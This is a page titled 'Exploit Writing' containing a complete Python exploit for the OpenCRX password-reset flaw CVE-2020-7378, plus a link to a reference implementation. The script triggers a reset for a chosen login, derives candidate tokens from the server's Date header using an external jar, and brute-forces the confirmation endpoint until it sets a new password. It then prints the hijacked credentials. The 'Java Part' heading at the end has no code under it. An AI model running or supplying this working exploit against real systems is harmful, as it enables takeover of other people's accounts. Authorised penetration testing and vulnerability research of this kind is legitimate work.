Exploit Writing

Sample Python exploit for an insecure password-reset flow (predictable, time-derived reset tokens)

The exploit is based on the OpenCRX authentication bypass (CVE-2020-7378): the password-reset token is derived from the server timestamp at which the reset was requested, so an attacker who learns that time from the HTTP `Date` header of the reset response can enumerate the small set of candidate tokens and brute-force the confirmation endpoint. Reference implementation of the same attack: https://github.com/ruthvikvegunta/openCRX-CVE-2020-7378

Python part (it also calls an external .jar program that generates the candidate token list for a given time window):

import argparse
import os
import subprocess
import sys
from datetime import datetime
from email.utils import parsedate_to_datetime

import requests

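# OpenCRX (CVE-2020-7378) password-reset token brute force.
#
# Flow, as implemented below:
#   1. POST a password-reset request for the target login and read the HTTP
#      ``Date`` header of the response.
#   2. Convert that timestamp to epoch milliseconds and have the external
#      token-generator jar emit every candidate token for a small window
#      around it (the reset token is derived from the server time at which it
#      was generated; the jar reproduces that derivation).
#   3. Submit each candidate to ``PasswordResetConfirm.jsp`` together with the
#      new password until the server stops answering "Unable to reset password".
#
# Only run this against systems you are authorised to test.

# Original hard-coded locations, kept as defaults so existing invocations still work.
DEFAULT_JAR = "/Users/kamil/projekty/labRandom/out/artifacts/labRandom_jar/labRandom.jar"
DEFAULT_PROXY = "http://127.0.0.1:8080"
TOKENS_FILE = "tokens.txt"
# Text the server returns for a rejected token; its absence is the success signal.
FAILURE_MARKER = "Unable to reset password"
# The original requests had no timeout and could hang forever on a stalled target/proxy.
REQUEST_TIMEOUT = 15


def parse_args(argv=None):
    """Parse the command line.

    ``-i/-l/-p`` are unchanged from the original script; ``--port``, ``--jar``,
    ``--proxy`` and ``--skew`` replace values that used to be hard-coded and
    default to those same values.
    """
    parser = argparse.ArgumentParser(description='OpenCRX authentication bypass')
    parser.add_argument("-i", "--ip", type=str, help='OpenCRX IP / hostname', required=True)
    parser.add_argument("-l", "--login", type=str, help='Login of the user we want to hack', required=True)
    parser.add_argument("-p", "--password", type=str, help='New password which will be set after exploit run', required=True)
    parser.add_argument("--port", type=int, default=8080, help='OpenCRX HTTP port (default 8080)')
    parser.add_argument("--jar", type=str, default=DEFAULT_JAR,
                        help='Path to the token-generator jar (default: %(default)s)')
    parser.add_argument("--proxy", type=str, default=DEFAULT_PROXY,
                        help="HTTP(S) proxy URL, e.g. Burp (default: %(default)s); pass '' to connect directly")
    parser.add_argument("--skew", type=int, default=1000,
                        help='Half-width in milliseconds of the token window around the server Date (default 1000)')
    return parser.parse_args(argv)


def token_window(date_header, skew_ms=1000):
    """Return ``(start_ms, stop_ms)`` epoch-millisecond bounds around an HTTP Date header.

    The Date header has one-second resolution, so the window must be at least
    +/-1000 ms to be sure of covering the instant the token was generated; widen
    it (more guesses) when server clock or response latency are uncertain.

    Raises ValueError if the header is missing or cannot be parsed, instead of
    crashing with an unrelated TypeError/AttributeError as the original did.
    """
    if not date_header:
        raise ValueError("response carried no Date header; cannot derive the token window")
    try:
        moment = parsedate_to_datetime(date_header)
    except (TypeError, ValueError) as err:  # TypeError on older Pythons, ValueError on 3.10+
        raise ValueError("unparsable Date header: {!r}".format(date_header)) from err
    epoch_ms = int(moment.timestamp() * 1000)
    return epoch_ms - skew_ms, epoch_ms + skew_ms


def reset_succeeded(status_code, body):
    """Return True when a confirm response looks like a successful reset.

    The original only checked that the failure marker was absent; a 5xx or a
    proxy error page also lacks it and would have been misreported as success,
    so non-2xx responses are treated as failures here.
    NOTE(review): assumes a genuine success comes back 2xx -- confirm on a live target.
    """
    return 200 <= status_code < 300 and FAILURE_MARKER not in body


def generate_tokens(jar_path, start_ms, stop_ms, tokens_file=TOKENS_FILE):
    """Run the token-generator jar for ``[start_ms, stop_ms]`` and return its tokens.

    The jar is invoked as an argument list without a shell, so nothing in the
    arguments can be interpreted by a shell, and ``check=True`` turns a failing
    generator into an exception instead of silently yielding an empty list.
    The jar is expected to write one token per line to ``tokens_file`` in the
    current directory -- that is the Java part's interface, not this script's.

    Raises OSError (java not on PATH, tokens file missing) or
    subprocess.CalledProcessError (jar exited non-zero).
    """
    subprocess.run(["java", "-jar", jar_path, str(start_ms), str(stop_ms)], check=True)
    with open(tokens_file) as handle:
        stripped = (line.rstrip() for line in handle)
        # Drop blank lines and duplicates while keeping generation order.
        return list(dict.fromkeys(tok for tok in stripped if tok))


def request_reset(session, base_url, user):
    """Trigger a password reset for ``user`` and return the response ``Date`` header (or None).

    The Date header is all we need from this response: it tells us, to the
    second, when the server minted the reset token.
    """
    reply = session.post("{}/opencrx-core-CRX/RequestPasswordReset.jsp".format(base_url),
                         data={"id": user}, timeout=REQUEST_TIMEOUT)
    return reply.headers.get("Date")


def brute_force(session, base_url, user, new_password, tokens):
    """Submit each candidate token; return the first one accepted, or None."""
    confirm_url = "{}/opencrx-core-CRX/PasswordResetConfirm.jsp".format(base_url)
    for token in tokens:
        # Same form as the original: t=resetToken&p=CRX&s=Standard&id=<user>&password1=..&password2=..
        payload = {
            "t": token,
            "p": "CRX",
            "s": "Standard",
            "id": user,
            "password1": new_password,
            "password2": new_password,
        }
        reply = session.post(confirm_url, data=payload, timeout=REQUEST_TIMEOUT)
        if reset_succeeded(reply.status_code, reply.text):
            return token
    return None


def main(argv=None):
    """Entry point: reset the target user's password via the predictable-token flaw."""
    args = parse_args(argv)
    base_url = "http://{}:{}".format(args.ip, args.port)

    session = requests.Session()
    session.verify = False  # kept from the original; only matters if the scheme is changed to https
    if args.proxy:
        # NOTE: the default proxy and the default target port are both 8080 -- if the
        # target runs on this host, pass --proxy '' or a different --port.
        session.proxies.update({"http": args.proxy, "https": args.proxy})

    date_header = request_reset(session, base_url, args.login)
    try:
        start_ms, stop_ms = token_window(date_header, args.skew)
    except ValueError as err:
        sys.exit("error: {}".format(err))

    try:
        tokens = generate_tokens(args.jar, start_ms, stop_ms)
    except (OSError, subprocess.CalledProcessError) as err:
        sys.exit("error: token generation failed ({}); check --jar and that java is on PATH".format(err))
    if not tokens:
        sys.exit("error: {} is empty; nothing to try".format(TOKENS_FILE))

    print("Please Wait")
    print("Hacking in progress...")
    print("Trying {} candidate tokens for window [{}, {}] ms".format(len(tokens), start_ms, stop_ms))
    token = brute_force(session, base_url, args.login, args.password, tokens)
    if token is None:
        # The original exited silently with status 0 here; make the failure visible.
        sys.exit("No candidate token was accepted; widen --skew or check the server clock")
    print("Successful reset with token: %s" % token)
    print("You can now login with the following credentials: {}, {}".format(args.login, args.password))


if __name__ == "__main__":
    main()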

Java Part:
